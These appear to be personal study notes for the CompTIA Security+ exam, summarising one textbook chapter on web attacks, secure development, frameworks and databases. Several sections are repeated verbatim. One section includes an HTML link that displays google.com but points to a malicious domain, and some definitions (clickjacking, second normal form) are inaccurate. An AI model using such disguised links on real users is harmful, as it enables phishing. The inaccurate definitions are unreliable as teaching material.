CompTIA Security+ 501 Summary Part 7
This is a summary of my notes on Chapter 7 of the CompTIA Security+ Get Certified Get Ahead by Darril Gibson, 5th Edition
Things to keep in mind:
2. Browser Attacks & Code Design Typo Squatting is when an actor buys a domain name that looks very similar to a legitimate one and may use it to trick users into thinking they are on the legitimate website. Clickjacking tricks users into clicking something other than what they think they’re clicking. You can do this very easily with HTML by hiding the actual URL of a link behind a fake address:
3. Processes, Models, & Frameworks Error and exception handling protect the integrity of operating systems and controls the errors shown to users. Programmers should include generic error messages for users but log detailed information for themselves. Static code analysis is the examination of code without running it. Dynamic analysis is the examination of code while running it. Fuzzing is the technique of sending random strings of data to applications to test for vulnerabilities and errors. Stress testing is testing how much load an application can take. Lots of popular games make use of stress tests to test server strength for multiplayer activities. Sandboxing is running an application within an isolated environment to test it. Model verification ensures that applications meet all specifications and fulfill intended purposes. Software Development Life Cycle, or SDLC, models provide structure. The Waterfall model, which preceded the Agile Model, includes multiple stages where each stages feeds the stage below it in succession. It’s very difficult to go back one stage up once it is complete and that is why it lacks flexibility. Agile has taken over the workplace because is uses interactive cycles that include the collaboration of all the necessary teams. Each cycle creates a working product and testers can verify the product. Developers then move to the next cycle to add or remove features depending on what certain teams desire. Secure Devops is an agile-aligned development cycle that includes the input of security teams and their considerations. Change Management ensures developers do not make unauthorized changes and version control tracks those changes with versions or enumerations of software; users who made the update are also tracked. User accounts can be provisioned, created and added to the system environment, or deprovisioned, removed. Provisioning an application refers to preparing and configuring that application while deprovisioning an application refers to removing it from a system. Frameworks are structures used to provide a foundation to IT personnel. Regulatory framesworks are based on laws and regulations; HIPAA. Non-regulatory framworks are based on common standards and best practices that organizations can follow; COBIT. An example of a National framework would be NIST which focuses on cybersecurity activities and risks within the United States. An example of an International framework would be ISO, or International Organization for Standardization. Industry-specific frameworks only apply to specific industries. For example, Payment Card Industry Data Security Standard, PCI DSS, includes 12 requirements and over 220 sub-requirements that organizations who process credit card data must follow to protect the credit card data.
4. Web Servers & Databases Web Servers host web sites on the Internet. Apache is the most popular web server software used. A database is simply a structured set of data and individual elements within that structure are called fields. Normalization of a database is the organizing of tables and columns to reduce redundant data and improve overall performance of that database. First Normal Form, 1NF, databases meet these three criteria: 1. Each row within a table is unique and identified with a primary key – 2. Related data is contained in a separate table – 3. None of the columns include repeating groups. A Second Normal Form, 2NF, database is when two or more columns make up the full primary key. A Third Normal Form, 3NF, database is when it is in 2NF(implies it is also in 1NF), and all columns other than the primary key are completely dependent on the primary key instead of non-primary key attributes. SQL Injection is an attack where SQL queries are modified to reveal additional, unintended, data. The asterisk, *, means wildcard in most cases, including in SQL, and it will cause the database to return all columns in a table. The semicolon indicates the end of an SQL line and two dashes, - -, indicate an ignored comment. Two dashes are usually placed at the end of the query to prevent an SQL error by commening out the second single quote that is usually attached to submitted data. Cross-site Scripting, XSS, is when actors embed malicious HTML or Javascript code into a website’s code. This malicious code then executes when another user visits the website. Cross-site Request Forgery, XSRF or CSRF, is an attack where an actor tricks a user into performing an action on a website. An example would be replacing a button with code that purchases an item off a website. The user would think they are doing on thing, but in reality the code behind the button makes them buy something off the website store.
- CompTIA is releasing an updated version of the Security+ Exam in November 2020 so this edition will soon be outdated. 90% of the book will remain the same in accordance with the updated exam. New threats and cloud-computing technology will probably make up the majority of that new 10% of content.
- Synthesizing paragraphs with a huge list of facts sometimes results in dreadful sentences. It also results in some streams of thought that end abruptly. Some notes cannot be digested any further and remain identical in this summary. In any case, these are just notes and not an essay.
- Some things are repeated but this is simply to reinforce.
- Hackers are referred to as actors.
2. Browser Attacks & Code Design Typo Squatting is when an actor buys a domain name that looks very similar to a legitimate one and may use it to trick users into thinking they are on the legitimate website. Clickjacking tricks users into clicking something other than what they think they’re clicking. You can do this very easily with HTML by hiding the actual URL of a link behind a fake address:
-
< a href=”maliciouswebsite[.]com”>google.com< / a >
3. Processes, Models, & Frameworks Error and exception handling protect the integrity of operating systems and controls the errors shown to users. Programmers should include generic error messages for users but log detailed information for themselves. Static code analysis is the examination of code without running it. Dynamic analysis is the examination of code while running it. Fuzzing is the technique of sending random strings of data to applications to test for vulnerabilities and errors. Stress testing is testing how much load an application can take. Lots of popular games make use of stress tests to test server strength for multiplayer activities. Sandboxing is running an application within an isolated environment to test it. Model verification ensures that applications meet all specifications and fulfill intended purposes. Software Development Life Cycle, or SDLC, models provide structure. The Waterfall model, which preceded the Agile Model, includes multiple stages where each stages feeds the stage below it in succession. It’s very difficult to go back one stage up once it is complete and that is why it lacks flexibility. Agile has taken over the workplace because is uses interactive cycles that include the collaboration of all the necessary teams. Each cycle creates a working product and testers can verify the product. Developers then move to the next cycle to add or remove features depending on what certain teams desire. Secure Devops is an agile-aligned development cycle that includes the input of security teams and their considerations. Change Management ensures developers do not make unauthorized changes and version control tracks those changes with versions or enumerations of software; users who made the update are also tracked. User accounts can be provisioned, created and added to the system environment, or deprovisioned, removed. Provisioning an application refers to preparing and configuring that application while deprovisioning an application refers to removing it from a system. Frameworks are structures used to provide a foundation to IT personnel. Regulatory framesworks are based on laws and regulations; HIPAA. Non-regulatory framworks are based on common standards and best practices that organizations can follow; COBIT. An example of a National framework would be NIST which focuses on cybersecurity activities and risks within the United States. An example of an International framework would be ISO, or International Organization for Standardization. Industry-specific frameworks only apply to specific industries. For example, Payment Card Industry Data Security Standard, PCI DSS, includes 12 requirements and over 220 sub-requirements that organizations who process credit card data must follow to protect the credit card data.
4. Web Servers & Databases Web Servers host web sites on the Internet. Apache is the most popular web server software used. A database is simply a structured set of data and individual elements within that structure are called fields. Normalization of a database is the organizing of tables and columns to reduce redundant data and improve overall performance of that database. First Normal Form, 1NF, databases meet these three criteria: 1. Each row within a table is unique and identified with a primary key – 2. Related data is contained in a separate table – 3. None of the columns include repeating groups. A Second Normal Form, 2NF, database is when two or more columns make up the full primary key. A Third Normal Form, 3NF, database is when it is in 2NF(implies it is also in 1NF), and all columns other than the primary key are completely dependent on the primary key instead of non-primary key attributes. SQL Injection is an attack where SQL queries are modified to reveal additional, unintended, data. The asterisk, *, means wildcard in most cases, including in SQL, and it will cause the database to return all columns in a table. The semicolon indicates the end of an SQL line and two dashes, - -, indicate an ignored comment. Two dashes are usually placed at the end of the query to prevent an SQL error by commening out the second single quote that is usually attached to submitted data. Cross-site Scripting, XSS, is when actors embed malicious HTML or Javascript code into a website’s code. This malicious code then executes when another user visits the website. Cross-site Request Forgery, XSRF or CSRF, is an attack where an actor tricks a user into performing an action on a website. An example would be replacing a button with code that purchases an item off a website. The user would think they are doing on thing, but in reality the code behind the button makes them buy something off the website store.